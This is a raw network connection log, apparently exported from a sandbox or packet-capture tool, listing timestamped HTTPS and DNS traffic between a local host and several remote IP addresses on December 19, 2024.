                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376671076 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376702070 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376717091 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376737118 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376750946 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376760960 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376774073 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376806974 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376836061 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.376849890 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403093100 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403117895 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403188944 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403244019 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403270960 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403353930 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403645992 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403886080 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403899908 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403918028 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403928041 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403968096 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403984070 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.403995037 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404028893 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404040098 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404052019 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404063940 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404088020 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404098034 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404138088 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404289961 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404299974 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404311895 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404320955 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404333115 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404380083 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404455900 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404463053 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.404476881 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.413985968 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.414187908 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.414673090 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415221930 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415235996 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415358067 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415364981 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415380001 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415399075 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415504932 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415512085 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415524960 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415563107 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.415585995 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.596784115 CET44349836108.139.47.108192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.596853018 CET44349836108.139.47.108192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.597379923 CET49836443192.168.2.7108.139.47.108
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.597481966 CET49836443192.168.2.7108.139.47.108
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.597481966 CET49836443192.168.2.7108.139.47.108
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.597501040 CET44349836108.139.47.108192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.598215103 CET49836443192.168.2.7108.139.47.108
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.624876976 CET4434984294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.624974966 CET49842443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.635178089 CET49842443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.635202885 CET4434984294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.636979103 CET49842443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.637001038 CET4434984294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.836265087 CET4434983452.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.836366892 CET4434983452.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.836910963 CET49834443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.837436914 CET49834443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.837460041 CET4434983452.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.876199961 CET4434984320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.876451969 CET49843443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.876471043 CET4434984320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.876939058 CET4434984320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.877291918 CET49843443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.877372026 CET4434984320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.877425909 CET49843443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:06.919379950 CET4434984320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.321156979 CET4434984320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.321383953 CET4434984320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.321458101 CET49843443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.322494984 CET49843443192.168.2.720.110.205.119
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.322540045 CET4434984320.110.205.119192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.384547949 CET44349844104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.384793997 CET49844443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.384836912 CET44349844104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.385787010 CET44349844104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:07.385840893 CET49844443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.500746012 CET4434985552.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.515598059 CET4434985652.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.515847921 CET49856443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.515871048 CET4434985652.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.516283035 CET4434985652.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.516644955 CET49856443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.516724110 CET4434985652.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.516787052 CET49856443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.516915083 CET49856443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.516954899 CET4434985652.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.520060062 CET49856443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.520138979 CET4434985652.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.719460964 CET44349790162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.719536066 CET44349790162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.719571114 CET44349791162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.719650984 CET49790443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.719748020 CET44349791162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:11.719980001 CET49791443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.042640924 CET44349794162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.042686939 CET44349792162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.042716026 CET44349794162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.042730093 CET44349792162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.042790890 CET49794443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.042834997 CET49792443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.043896914 CET44349793162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.044049978 CET44349793162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.044109106 CET49793443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.044821978 CET44349795162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.044869900 CET44349795162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.045941114 CET49795443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.067435026 CET4434985552.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.067495108 CET4434985552.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.067574024 CET49855443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.067985058 CET49855443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.068032026 CET4434985552.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.140063047 CET4434985494.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.140237093 CET4434985494.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.140291929 CET49854443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.140291929 CET49854443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.141072989 CET49854443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.141087055 CET4434985494.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.347326040 CET4434985952.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.350384951 CET49859443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.350394964 CET4434985952.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.352042913 CET4434985952.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.352114916 CET49859443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.352605104 CET49859443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.352605104 CET49859443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.352618933 CET4434985952.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.352633953 CET49859443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.352694035 CET4434985952.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.407665968 CET49859443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.407675982 CET4434985952.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.430964947 CET44349796162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.431035995 CET44349796162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.431231022 CET49796443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.453741074 CET49859443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.516235113 CET4434986052.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.518201113 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.518219948 CET4434986052.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.519691944 CET4434986052.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.519750118 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.521349907 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.521440983 CET4434986052.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.521568060 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.521636963 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.521651983 CET4434986052.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.566658020 CET49860443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.821856976 CET4434985952.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.822073936 CET4434985952.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.822175026 CET49859443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.822724104 CET49859443192.168.2.752.168.117.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.822741032 CET4434985952.168.117.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.853121996 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.853218079 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.853245974 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.853298903 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.853415966 CET4434983294.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.853476048 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:12.854087114 CET49832443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:20.809470892 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:20.809743881 CET49868443192.168.2.794.130.191.168
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:20.809757948 CET4434986894.130.191.168192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:22.673891068 CET4434982623.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:22.674061060 CET4434982623.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:22.674118996 CET49826443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.010679960 CET4434982923.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.010870934 CET4434982923.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.011049986 CET49829443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.692734003 CET49826443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.692770004 CET4434982623.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.692785978 CET49829443192.168.2.723.49.251.8
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:23.692821026 CET4434982923.49.251.8192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.719989061 CET44349845104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.720402002 CET44349845104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.720460892 CET49845443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.728830099 CET44349844104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.728898048 CET44349844104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:26.728955984 CET49844443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:48.243072987 CET49796443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:48.243094921 CET44349796162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.783447981 CET49847443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.783456087 CET49846443192.168.2.7204.79.197.219
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.783462048 CET44349847204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:52.783505917 CET44349846204.79.197.219192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.883184910 CET49844443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.883208036 CET44349844104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.883301973 CET49845443192.168.2.7104.126.116.50
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:53.883327961 CET44349845104.126.116.50192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.214749098 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.214786053 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.214884043 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.215089083 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:54.215102911 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.425133944 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.425540924 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.425556898 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.426589012 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.426687956 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.426964998 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.427062035 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.470627069 CET49876443192.168.2.723.219.82.40
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.470654964 CET4434987623.219.82.40192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:14:55.517360926 CET49876443192.168.2.723.219.82.40
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.354820013 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.377264023 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.415250063 CET63673443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.490134954 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.648832083 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.649122000 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.649895906 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.649933100 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.650484085 CET5167353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.650703907 CET5055653192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.652445078 CET6090353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.652661085 CET6059953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.653032064 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.751863956 CET63673443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765032053 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765125990 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765140057 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765145063 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765149117 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765158892 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765171051 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765182018 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.765235901 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.773155928 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.773349047 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.773425102 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.773475885 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.790715933 CET53516731.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.792205095 CET53505561.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.804016113 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.817250967 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.817346096 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.817425966 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.817437887 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.910213947 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.917823076 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.932440042 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.949525118 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.955205917 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963615894 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963643074 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963675976 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963686943 CET44360208162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.963972092 CET60208443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                          Dec 19, 2024 08:13:56.967225075 CET44360208162.159.61.3192.168.2.7
